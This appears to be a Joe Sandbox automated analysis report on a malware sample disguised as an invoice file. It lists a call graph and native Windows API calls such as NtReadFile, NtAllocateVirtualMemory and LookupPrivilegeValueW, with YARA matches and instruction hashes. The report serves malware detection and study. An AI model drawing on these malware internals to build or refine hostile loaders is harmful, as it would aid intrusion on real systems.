99165->99166 99167 41af60 LdrLoadDll 99165->99167 99168 41a320 LdrLoadDll 99166->99168 99167->99166 99168->99071 99170 41af60 LdrLoadDll 99169->99170 99171 41a4ac NtClose 99170->99171 99171->99076 99172->99056 99173->99120 99188 41a630 99174->99188 99176 41bfa8 99176->99149 99178 41a42c NtReadFile 99177->99178 99179 41af60 LdrLoadDll 99177->99179 99178->99148 99179->99178 99182 41bbb4 99181->99182 99183 41bb9d 99181->99183 99182->99160 99183->99182 99184 41bf90 2 API calls 99183->99184 99185 41bbcb 99184->99185 99185->99160 99186->99150 99187->99139 99189 41a645 99188->99189 99190 41af60 LdrLoadDll 99189->99190 99191 41a64c RtlAllocateHeap 99190->99191 99191->99176 99315 41a540 99192->99315 99194 41bd6d 99194->99081 99196 414081 99195->99196 99198 414089 99195->99198 99196->99084 99197 41435c 99197->99084 99198->99197 99319 41cf30 99198->99319 99200 4140dd 99201 41cf30 2 API calls 99200->99201 99204 4140e8 99201->99204 99202 414136 99205 41cf30 2 API calls 99202->99205 99204->99202 99324 41cfd0 99204->99324 99207 41414a 99205->99207 99206 41cf30 2 API calls 99209 4141bd 99206->99209 99207->99206 99208 41cf30 2 API calls 99217 414205 99208->99217 99209->99208 99211 414334 99331 41cf90 LdrLoadDll RtlFreeHeap 99211->99331 99213 41433e 99332 41cf90 LdrLoadDll RtlFreeHeap 99213->99332 99215 414348 99333 41cf90 LdrLoadDll RtlFreeHeap 99215->99333 99330 41cf90 LdrLoadDll RtlFreeHeap 99217->99330 99218 414352 99334 41cf90 LdrLoadDll RtlFreeHeap 99218->99334 99221 4153a1 99220->99221 99222 414a50 8 API calls 99221->99222 99224 4153b7 99222->99224 99223 41540a 99223->99088 99224->99223 99225 4153f2 99224->99225 99226 415405 99224->99226 99227 41bdc0 2 API calls 99225->99227 99228 41bdc0 2 API calls 99226->99228 99229 4153f7 99227->99229 99228->99223 99229->99088 99231 41ad84 99230->99231 99232 41ac30 LdrLoadDll 99230->99232 99335 41ac30 99231->99335 99232->99231 99235 41ac30 LdrLoadDll 99236 41ad96 99235->99236 99237 41ac30 LdrLoadDll 99236->99237 99238 41ad9f 99237->99238 99239 41ac30 LdrLoadDll 99238->99239 99240 41ada8 99239->99240 99241 41ac30 LdrLoadDll 99240->99241 99242 41adb1 99241->99242 99243 41ac30 LdrLoadDll 99242->99243 99244 41adbd 99243->99244 99245 41ac30 LdrLoadDll 99244->99245 99246 41adc6 99245->99246 99247 41ac30 LdrLoadDll 99246->99247 99248 41adcf 99247->99248 99249 41ac30 LdrLoadDll 99248->99249 99250 41add8 99249->99250 99251 41ac30 LdrLoadDll 99250->99251 99252 41ade1 99251->99252 99253 41ac30 LdrLoadDll 99252->99253 99254 41adea 99253->99254 99255 41ac30 LdrLoadDll 99254->99255 99256 41adf6 99255->99256 99257 41ac30 LdrLoadDll 99256->99257 99258 41adff 99257->99258 99259 41ac30 LdrLoadDll 99258->99259 99260 41ae08 99259->99260 99261 41ac30 LdrLoadDll 99260->99261 99262 41ae11 99261->99262 99263 41ac30 LdrLoadDll 99262->99263 99264 41ae1a 99263->99264 99265 41ac30 LdrLoadDll 99264->99265 99266 41ae23 99265->99266 99267 41ac30 LdrLoadDll 99266->99267 99268 41ae2f 99267->99268 99269 41ac30 LdrLoadDll 99268->99269 99270 41ae38 99269->99270 99271 41ac30 LdrLoadDll 99270->99271 99272 41ae41 99271->99272 99273 41ac30 LdrLoadDll 99272->99273 99274 41ae4a 99273->99274 99275 41ac30 LdrLoadDll 99274->99275 99276 41ae53 99275->99276 99277 41ac30 LdrLoadDll 99276->99277 99278 41ae5c 99277->99278 99279 41ac30 LdrLoadDll 99278->99279 99280 41ae68 99279->99280 99281 41ac30 LdrLoadDll 99280->99281 99282 41ae71 99281->99282 99283 41ac30 LdrLoadDll 99282->99283 99284 41ae7a 99283->99284 99285 41ac30 LdrLoadDll 99284->99285 99286 41ae83 99285->99286 99287 41ac30 LdrLoadDll 99286->99287 99288 41ae8c 99287->99288 99289 41ac30 LdrLoadDll 99288->99289 99290 41ae95 99289->99290 99291 41ac30 LdrLoadDll 99290->99291 99292 41aea1 99291->99292 99293 41ac30 LdrLoadDll 99292->99293 99294 41aeaa 99293->99294 99295 41ac30 LdrLoadDll 99294->99295 99296 41aeb3 99295->99296 99297 41ac30 LdrLoadDll 99296->99297 99298 41aebc 99297->99298 99299 41ac30 LdrLoadDll 99298->99299 99300 41aec5 99299->99300 99301 41ac30 LdrLoadDll 99300->99301 99302 41aece 99301->99302 99303 41ac30 LdrLoadDll 99302->99303 99304 41aeda 99303->99304 99305 41ac30 LdrLoadDll 99304->99305 99306 41aee3 99305->99306 99307 41ac30 LdrLoadDll 99306->99307 99308 41aeec 99307->99308 99308->99092 99310 41af60 LdrLoadDll 99309->99310 99311 419edc 99310->99311 99341 10c2df0 LdrInitializeThunk 99311->99341 99312 419ef3 99312->99012 99314->99090 99316 41a543 99315->99316 99317 41af60 LdrLoadDll 99316->99317 99318 41a55c NtAllocateVirtualMemory 99317->99318 99318->99194 99320 41cf40 99319->99320 99321 41cf46 99319->99321 99320->99200 99322 41bf90 2 API calls 99321->99322 99323 41cf6c 99322->99323 99323->99200 99325 41cff5 99324->99325 99329 41d02d 99324->99329 99326 41bf90 2 API calls 99325->99326 99327 41d00a 99326->99327 99328 41bdc0 2 API calls 99327->99328 99328->99329 99329->99204 99330->99211 99331->99213 99332->99215 99333->99218 99334->99197 99336 41ac4b 99335->99336 99337 414e50 LdrLoadDll 99336->99337 99338 41ac6b 99337->99338 99339 414e50 LdrLoadDll 99338->99339 99340 41ad17 99338->99340 99339->99340 99340->99235 99341->99312 99343 10c2c1f LdrInitializeThunk 99342->99343 99344 10c2c11 99342->99344 99343->99098 99344->99098 99346 41a68c RtlFreeHeap 99345->99346 99347 41af60 LdrLoadDll 99345->99347 99346->99102 99347->99346 99349 407eb0 99348->99349 99350 407eab 99348->99350 99351 41bd40 2 API calls 99349->99351 99350->99020 99354 407ed5 99351->99354 99352 407f38 99352->99020 99353 419ec0 2 API calls 99353->99354 99354->99352 99354->99353 99355 407f3e 99354->99355 99359 41bd40 2 API calls 99354->99359 99365 41a5c0 99354->99365 99357 407f64 99355->99357 99358 41a5c0 2 API calls 99355->99358 99357->99020 99360 407f55 99358->99360 99359->99354 99360->99020 99362 408168 99361->99362 99363 41a5c0 2 API calls 99362->99363 99364 40817e 99363->99364 99364->98981 99366 41af60 LdrLoadDll 99365->99366 99367 41a5dc 99366->99367 99370 10c2c70 LdrInitializeThunk 99367->99370 99368 41a5f3 99368->99354 99370->99368 99372 41b5c3 99371->99372 99375 40acf0 99372->99375 99376 40ad14 99375->99376 99377 409c4a 99376->99377 99378 40ad50 LdrLoadDll 99376->99378 99377->98987 99378->99377 99380 40b063 99379->99380 99382 40b0e0 99380->99382 99394 419c90 LdrLoadDll 99380->99394 99382->98994 99384 41af60 LdrLoadDll 99383->99384 99385 40f1bb 99384->99385 99385->99002 99386 41a7d0 99385->99386 99387 41a7ef LookupPrivilegeValueW 99386->99387 99388 41af60 LdrLoadDll 99386->99388 99387->98998 99388->99387 99390 41a27c 99389->99390 99391 41af60 LdrLoadDll 99389->99391 99395 10c2ea0 LdrInitializeThunk 99390->99395 99391->99390 99392 41a29b 99392->99001 99394->99382 99395->99392 99397 40b1f0 99396->99397 99398 40b040 LdrLoadDll 99397->99398 99399 40b204 99398->99399 99399->98936 99401 40ae51 99400->99401 99402 40ae4d 99400->99402 99403 40ae9c 99401->99403 99405 40ae6a 99401->99405 99402->98938 99448 419cd0 LdrLoadDll 99403->99448 99447 419cd0 LdrLoadDll 99405->99447 99406 40aead 99406->98938 99408 40ae8c 99408->98938 99410 40f4a0 3 API calls 99409->99410 99411 4143c6 99409->99411 99410->99411 99411->98940 99449 4087a0 99412->99449 99415 408a9d 99415->98942 99416 4087a0 19 API calls 99417 408a8a 99416->99417 99417->99415 99468 40f710 10 API calls 99417->99468 99420 41af60 LdrLoadDll 99419->99420 99421 41a51c 99420->99421 99594 10c2e80 LdrInitializeThunk 99421->99594 99422 40c322 99424 40f4a0 99422->99424 99425 40f4bd 99424->99425 99595 419fc0 99425->99595 99428 40f505 99428->98946 99429 41a010 2 API calls 99430 40f52e 99429->99430 99430->98946 99432 41a026 99431->99432 99433 41af60 LdrLoadDll 99432->99433 99434 41a02c 99433->99434 99601 10c2d10 LdrInitializeThunk 99434->99601 99435 40c385 99435->98952 99435->98955 99438 41af60 LdrLoadDll 99437->99438 99439 41a07c 99438->99439 99602 10c2d30 LdrInitializeThunk 99439->99602 99440 40c459 99440->98963 99443 41af60 LdrLoadDll 99442->99443 99444 419e3c 99443->99444 99603 10c2fb0 LdrInitializeThunk 99444->99603 99445 40c4ac 99445->98967 99447->99408 99448->99406 99450 407ea0 4 API calls 99449->99450 99466 4087ba 99450->99466 99451 408a49 99451->99415 99451->99416 99452 408a3f 99453 408160 2 API calls 99452->99453 99453->99451 99456 419f00 2 API calls 99456->99466 99459 41a490 LdrLoadDll NtClose 99459->99466 99462 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99462->99466 99465 419e20 2 API calls 99465->99466 99466->99451 99466->99452 99466->99456 99466->99459 99466->99462 99466->99465 99469 419d10 99466->99469 99472 4085d0 99466->99472 99486 408120 99466->99486 99491 40f5f0 LdrLoadDll NtClose 99466->99491 99492 419d90 LdrLoadDll 99466->99492 99493 419dc0 LdrLoadDll 99466->99493 99494 419e50 LdrLoadDll 99466->99494 99495 4083a0 99466->99495 99511 405f60 LdrLoadDll 99466->99511 99468->99415 99470 419d2c 99469->99470 99471 41af60 LdrLoadDll 99469->99471 99470->99466 99471->99470 99473 4085e6 99472->99473 99512 419880 99473->99512 99475 4085ff 99476 408771 99475->99476 99477 408120 2 API calls 99475->99477 99476->99466 99478 40861f 99477->99478 99478->99476 99533 4081a0 99478->99533 99480 4086e5 99480->99476 99481 4083a0 11 API calls 99480->99481 99482 408713 99481->99482 99482->99476 99483 419f00 2 API calls 99482->99483 99484 408748 99483->99484 99484->99476 99485 41a500 2 API calls 99484->99485 99485->99476 99487 408153 99486->99487 99488 40812b 99486->99488 99487->99466 99488->99466 99488->99487 99489 41a5c0 2 API calls 99488->99489 99490 40817e 99489->99490 99490->99466 99491->99466 99492->99466 99493->99466 99494->99466 99496 4083c9 99495->99496 99573 408310 99496->99573 99499 41a500 2 API calls 99500 4083dc 99499->99500 99500->99499 99501 408467 99500->99501 99504 408462 99500->99504 99581 40f670 99500->99581 99501->99466 99502 41a490 2 API calls 99503 40849a 99502->99503 99503->99501 99505 419d10 LdrLoadDll 99503->99505 99504->99502 99506 4084ff 99505->99506 99506->99501 99585 419d50 99506->99585 99508 408563 99508->99501 99509 414a50 8 API calls 99508->99509 99510 4085b8 99509->99510 99510->99466 99511->99466 99513 41bf90 2 API calls 99512->99513 99514 419897 99513->99514 99540 409310 99514->99540 99516 4198b2 99517 4198f0 99516->99517 99518 4198d9 99516->99518 99521 41bd40 2 API calls 99517->99521 99519 41bdc0 2 API calls 99518->99519 99520 4198e6 99519->99520 99520->99475 99522 41992a 99521->99522 99523 41bd40 2 API calls 99522->99523 99525 419943 99523->99525 99530 419be4 99525->99530 99546 41bd80 99525->99546 99527 419bd0 99528 41bdc0 2 API calls 99527->99528 99529 419bda 99528->99529 99529->99475 99531 41bdc0 2 API calls 99530->99531 99532 419c39 99531->99532 99532->99475 99534 40829f 99533->99534 99535 4081b5 99533->99535 99534->99480 99535->99534 99536 414a50 8 API calls 99535->99536 99538 408222 99536->99538 99537 408249 99537->99480 99538->99537 99539 41bdc0 2 API calls 99538->99539 99539->99537 99541 409335 99540->99541 99542 40acf0 LdrLoadDll 99541->99542 99543 409368 99542->99543 99545 40938d 99543->99545 99549 40cf20 99543->99549 99545->99516 99567 41a580 99546->99567 99550 40cf4c 99549->99550 99551 41a1e0 LdrLoadDll 99550->99551 99552 40cf65 99551->99552 99553 40cf6c 99552->99553 99560 41a220 99552->99560 99553->99545 99557 40cfa7 99558 41a490 2 API calls 99557->99558 99559 40cfca 99558->99559 99559->99545 99561 41a23c 99560->99561 99562 41af60 LdrLoadDll 99560->99562 99566 10c2ca0 LdrInitializeThunk 99561->99566 99562->99561 99563 40cf8f 99563->99553 99565 41a810 LdrLoadDll 99563->99565 99565->99557 99566->99563 99568 41af60 LdrLoadDll 99567->99568 99569 41a59c 99568->99569 99572 10c2f90 LdrInitializeThunk 99569->99572 99570 419bc9 99570->99527 99570->99530 99572->99570 99574 408328 99573->99574 99575 40acf0 LdrLoadDll 99574->99575 99576 408343 99575->99576 99577 414e50 LdrLoadDll 99576->99577 99578 408353 99577->99578 99579 40835c PostThreadMessageW 99578->99579 99580 408370 99578->99580 99579->99580 99580->99500 99582 40f683 99581->99582 99588 419e90 99582->99588 99586 41af60 LdrLoadDll 99585->99586 99587 419d6c 99586->99587 99587->99508 99589 419eac 99588->99589 99590 41af60 LdrLoadDll 99588->99590 99593 10c2dd0 LdrInitializeThunk 99589->99593 99590->99589 99591 40f6ae 99591->99500 99593->99591 99594->99422 99596 41af60 LdrLoadDll 99595->99596 99597 419fdc 99596->99597 99600 10c2f30 LdrInitializeThunk 99597->99600 99598 40f4fe 99598->99428 99598->99429 99600->99598 99601->99435 99602->99440 99603->99445 99605 10c2ad0 LdrInitializeThunk

                                            Executed Functions

                                            Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: 04e1bd880cfd72081a73b7a46b4b9ca98df7ca44878478348cf181a25f0864c8
                                            • Instruction ID: d91a71bae094839c6f53024954502cb6396e170108d538902695813fc16e7275
                                            • Opcode Fuzzy Hash: 04e1bd880cfd72081a73b7a46b4b9ca98df7ca44878478348cf181a25f0864c8
                                            • Instruction Fuzzy Hash: 65F0F9B2200108AFDB18CF99DC80DEB77A9EF8C354F158259BA0DD7241D630E811CBA0
                                            Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 41a410-41a426 5 41a42c-41a459 NtReadFile 4->5 6 41a427 call 41af60 4->6 6->5
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                            Function 0041A45A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 22 41a45a-41a45b 23 41a450-41a459 NtReadFile 22->23 24 41a45d-41a45e 22->24
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: rMA
                                            • API String ID: 2738559852-3963102562
                                            • Opcode ID: a790a499ccdd15888af11a4625ea2175bd51877bd84bc73be07d67cf935b3053
                                            • Instruction ID: 19f99969cc6355a20a8c3e8eef4660f910974c32d8b44531765f28cc0c01adec
                                            • Opcode Fuzzy Hash: a790a499ccdd15888af11a4625ea2175bd51877bd84bc73be07d67cf935b3053
                                            • Instruction Fuzzy Hash: 4CB012B5150004AD9920E6BAAC00DF7A36DDFCC267312890BF4CC91808503A84D64674
                                            Function 0041A5BA Relevance: 1.6, APIs: 1, Instructions: 51memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: d438d5a04f8c290545eb4733df9a0628e11c0978f4d27eb74fc4a1d8079902a2
                                            • Instruction ID: 3855a019e4ff1d8d693d0c370d73e53c98ad639c9dd2a7204d66a58f0ae602c4
                                            • Opcode Fuzzy Hash: d438d5a04f8c290545eb4733df9a0628e11c0978f4d27eb74fc4a1d8079902a2
                                            • Instruction Fuzzy Hash: 680125B1200208ABCB14DF89CC81DEB77ADEF88624F148249BE0897201D634E921CBA0
                                            Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 261 40acf0-40ad0c 262 40ad14-40ad19 261->262 263 40ad0f call 41cc50 261->263 264 40ad1b-40ad1e 262->264 265 40ad1f-40ad2d call 41d070 262->265 263->262 268 40ad3d-40ad4e call 41b4a0 265->268 269 40ad2f-40ad3a call 41d2f0 265->269 274 40ad50-40ad64 LdrLoadDll 268->274 275 40ad67-40ad6a 268->275 269->268 274->275
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                            Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 276 41a35a-41a3b1 call 41af60 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 7820f1d91c44586cf9f9bfe4d73626575fa8b427a149f5ee5d9b0e9fec8528ea
                                            • Instruction ID: f3e3b63872cf962e1833d82bcf9bd4883850af71d6de87b57af12cbc961c7c93
                                            • Opcode Fuzzy Hash: 7820f1d91c44586cf9f9bfe4d73626575fa8b427a149f5ee5d9b0e9fec8528ea
                                            • Instruction Fuzzy Hash: 0A01B6B6245108ABCB08DF99DC85DEB37A9AF8C754F158248FA4D97241D630E851CBA4
                                            Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 279 41a360-41a376 280 41a37c-41a3b1 NtCreateFile 279->280 281 41a377 call 41af60 279->281 281->280
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 282 41a53a-41a53b 283 41a543-41a57d call 41af60 NtAllocateVirtualMemory 282->283 284 41a53d-41a53e 282->284 284->283
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 0ced1ca9834e1f53a12dae2883f286a804e118de7865877ae2f4bba70d6b1e6f
                                            • Instruction ID: 60bb00605d40865b87515067f5a152ea1485a41e012ecaa16310949698df84db
                                            • Opcode Fuzzy Hash: 0ced1ca9834e1f53a12dae2883f286a804e118de7865877ae2f4bba70d6b1e6f
                                            • Instruction Fuzzy Hash: 46F052B2200108ABCB14CF89CC80EEBB7ADAF88754F148209BA1897241D230E860CBA0
                                            Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            Function 010C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                            • Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
                                            • Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                            • Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226
                                            Function 010C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
                                            • Instruction ID: c066160ec28f5beb0148435097454f2a55734d6d649a9c50b8d031d6b0a14ff6
                                            • Opcode Fuzzy Hash: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
                                            • Instruction Fuzzy Hash: E690023520151802E180715C840464A001597D1301F95C016E0425654DCA158B5977A2
                                            Function 010C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
                                            • Instruction ID: 9ff5462fbf18240dcec5d2caf507bd818b7d71cfb6c30bd12f46db22c72a8dd0
                                            • Opcode Fuzzy Hash: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
                                            • Instruction Fuzzy Hash: 3D90043D311510031105F55C47045070057D7D5351355C033F1415550CD731CD715333
